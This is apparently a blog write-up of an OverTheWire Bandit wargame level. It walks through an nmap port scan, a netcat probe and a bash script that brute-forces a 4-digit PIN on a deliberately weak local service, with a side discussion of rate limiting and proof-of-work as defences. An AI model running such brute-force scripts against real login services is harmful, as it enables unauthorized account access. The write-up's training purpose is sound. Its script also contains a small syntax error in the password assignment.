Brute-Force Password Attacking
In this post, I would like to run through another one of OverTheWire's hacking challenges. To preserve the integrity of the challenges, all passwords in this post have been falsified.
In this level, we gain SSH entry to a remote server, however our user has no permissions for access to the rest of the system.
We will start by using Nmap, the 'Network Mapper'. Nmap is an open-source tool for network security auditing. You can man nmap to see the full options available with the tool, but for now we will do a full port-scan of our localhost:
bandit24@bandit:~$ nmap -p- localhost
Starting Nmap 7.01 ( https://nmap.org ) at 2018-02-21 09:48 CET
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00014s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 65523 closed ports
PORT STATE SERVICE
22/tcp open ssh
113/tcp open ident
12345/tcp open netbus
30002/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 2.96 seconds
So here we can see an unknown service listening on port 30002. Using Netcat to establish a TCP connection with this port gives us the following prompt:
bandit24@bandit:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
A hacker's dream, how convenient! Mind you, this is very much an entry-level challenge.
So the service listening on port 30002 is able to provide us the SSH password for an enhanced user, however it requires authentication of both our current password, and a 4 digit pin. While we do have the password to hand, we do not have such a pin.
Let us see if we can spot any flaws in this service:
UoMY6gzctqAwOmw1TrfrBFHyQXmgIohZ 1234
Wrong! Please enter the correct pincode. Try again.
UoMY6gzctqAwOmw1TrfrBFHyQXmgIohZ 4321
Wrong! Please enter the correct pincode. Try again.
Now we have tested the functionality of this service, and one vunerability can be spotted immediately: There is zero wait time between attempts, nor is there a maximum number of attempts! This service is happy to accept an unlimited number of pin variations until a correct pin is found, which is an easily exploitable vunerability through a simple brute-force attack.
Off-Topic Digression
As a side-note, brute-forceable authentication is one of the first things a hacker will check, and there are many methods of securing this.
An easy fix is to implement a maximum number of guesses paired with a time-delay function, where each failed attempt incurrs a cool-down period before the next input can be accepted. Apple, for example, utilise an incrementing cool-down counter between failed iPhone passcode attempts. Such a simple addition to the authentication model makes brute-forcing an iPhone passcode practically impossible. With a short 4 digit pin, this cool-down timer increases the time to brute-force an iPhone from mere seconds to 417 days. With more complex, alphanumeric passcodes, this time increases exponentially.
Hash-Cash's Proof-of-Work algorithm takes a very different approach to this issue. Invented as a means of combatting spam emails and forum posting, Hash Cash requires the client to perform computational "work" in the form of calculating a number of SHA256 hashes. The client is provided with a random number, and is tasked with running the SHA256 hash on this number until an output is found that has 20 leading zeros. The client has no way of reverse-engineering an ideal output, and is force to perform the thousands of calculations. Once a satisfactory output has been found, the hash pair is sent to the server for authentication, and the client is permitted to send their email, or make their forum post. This Proof-of-Work technology is used in Bitcoin to secure the randomisation of the race to mine each new block.
Anyway, back to the topic at hand. Our audit has presented us with an ideal attack vector, so now we just need to create our bruce-force bash script:
bandit24@bandit:~$ mkdir /tmp/skyenet
bandit24@bandit:~$ cd /tmp/skyenet
bandit24@bandit:/tmp/skyenet$ touch bruteforce.sh
bandit24@bandit:/tmp/skyenet$ ls
bruteforce.sh
In this script, we will create a simple function to generate every number between 0 and 9999, with padding to maintain the 4-digit length, and prefix our password to the output:
#!/bin/bash
password = "UoMY6gzctqAwOmw1TrfrBFHyQXmgIohZ"
for i in {0000..9999}
do
echo $password $i
done
Now we set the executable permissions to the script, and we will run it to direct the output to a brand new .txt file:
bandit24@bandit:/tmp/skyenet$ chmod +x bruteforce.sh
bandit24@bandit:/tmp/skyenet$ ./bruteforce.sh > pin_crack.txt
bandit24@bandit:/tmp/skyenet$ ls
bruteforce.sh pin_crack.txt
We now have our output, and we can see that is is formatted correctly for our brute-force attack:
bandit24@bandit:/tmp/skyenet$more pin_crack.txt
UoMY6gzctqAwOmw1TrfrBFHyQXmgIohZ 0001
UoMY6gzctqAwOmw1TrfrBFHyQXmgIohZ 0002
UoMY6gzctqAwOmw1TrfrBFHyQXmgIohZ 0003
UoMY6gzctqAwOmw1TrfrBFHyQXmgIohZ 0004
UoMY6gzctqAwOmw1TrfrBFHyQXmgIohZ 0005
...
All that is left now is to feed out 10,000 passcode attempts into the service on port 30002 until the correct one is found:
bandit24@bandit:/tmp/skyenet$ nc localhost 30002 < pin_crack.txt
...
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Correct!
The password of user bandit25 is uNG9O58gvZ0rxhtnUE7snukf3bjzSGzG
Fantastic! Once the correct password combination was input into the service, we were provided with the password for user bandit25:
bandit24@bandit:~$ ssh bandit25@localhost
bandit25@localhost's password: uNG9O58gvZ0rxhtnUE7snukf3bjzSGzG
...
bandit25@bandit:~$
And a correct password at that!
This has been a quick look at a (admittedly staged) brute-force attack, and the simple tools involved.
Thank you for reading!